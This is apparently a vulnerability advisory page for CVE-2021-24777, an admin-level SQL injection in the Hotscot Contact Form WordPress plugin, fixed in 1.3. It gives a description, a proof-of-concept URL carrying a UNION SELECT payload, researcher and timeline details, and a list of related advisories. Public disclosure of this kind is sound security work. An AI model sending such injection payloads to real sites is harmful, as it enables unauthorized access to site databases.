Hotscot Contact Form < 1.3 – Admin+ SQL Injection | CVE 2021-24777 | Plugin Vulnerabilities

Description

The view submission functionality in the plugin makes a get request with the sub_id parameter which not sanitised, escaped or validated before inserting to a SQL statement, leading to an SQL injection.

Proof of Concept

https://example.com/wp-admin/admin.php?page=hcf_contact&view_form_sub_id=1&sub_id=-7795%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,user(),NULL-- HTTP/1.1

Affects Plugins

hotscot-contact-form

Fixed in 1.3

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Syed Sheeraz Ali of Codevigilant

Verified

Yes

WPVDB ID

2dfde2ef-1b33-4dc9-aa3e-02d319effb3a

Timeline

Publicly Published

2021-05-13 (about 4 years ago)

Added

2022-02-14 (about 3 years ago)

Last Updated

2022-04-08 (about 3 years ago)

Other

Published

Title

Published

2023-10-18

Title

iPanorama 360 – WordPress Virtual Tour Builder < 1.8.1 - Authenticated (Contributor+) SQL Injection via Shortcode

Published

2015-08-22

Title

DukaPress <= 2.5.9 - Unauthenticated Blind SQL Injection

Published

2021-03-26

Title

Quiz And Survey Master < 7.1.12 - Authenticated SQL injection via shortcode

Published

2025-11-20

Title

Groundhogg < 4.2.7 - Authenticated (Admin+) SQL Injection

Published

2022-10-21

Title

Quiz And Survey Master < 7.3.5 - Admin+ SQL Injection